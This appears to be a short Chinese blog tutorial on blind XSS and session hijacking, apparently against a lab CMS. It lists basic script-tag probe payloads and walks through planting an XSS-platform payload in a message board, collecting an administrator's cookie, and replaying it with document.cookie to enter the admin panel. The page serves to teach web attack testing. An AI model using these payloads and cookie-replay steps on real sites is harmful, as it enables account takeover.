xss盲打

# 搜索框中搜索
<script>alert(/xss/)</script>
<script>confirm(/xss/);</script>
<script>confirm('xss');</script>
<script>prompt('xss');</script>

固定会话攻击

进入xss平台创建项目

项目配置完成后打开项目代码

将代码插入到可能存在xss漏洞的位置，进行留言，将代码插入到留言板

等待管理员查看

回到xss平台查看cookie信息

将获取到的cookie写入浏览器

cookie : 
username=admin; 
userid=1; 
PHPSESSID=4nlh6i2au2qpufav4qh5triel0

将得到的cookie输入到浏览器中，即可进入后台

document.cookie="username=admin";
document.cookie="userid=1";
document.cookie="PHPSESSID=4nlh6i2au2qpufav4qh5triel0";

然后直接访问10.4.7.130/cms/admin/

进入成功

本栏目推荐文章
• .NET中使用HtmlSanitizer来有效的防范XSS攻击！
• XunRuiCMS XSS
• 实验三（XSS和SQL注入）
• XSS注入测试思路+通用语句
• 【xss实战】BurpSuite-XssValidator插件 -xss自动化测试
• 通过kali安装源安装beef-xss
• 网络攻防技术——XSS攻击
• 最新搭建upload-labs和XSS漏洞测试平台
• 再谈XSS攻击的例子
• 你知道跨站脚本攻击吗?一篇带你了解什么叫做XSS 转载

0628 XSS0628 xss 模拟赛 题解b0628 0628 b0628 xss xss2 xss4 xss-labs xss1 dvwa-xss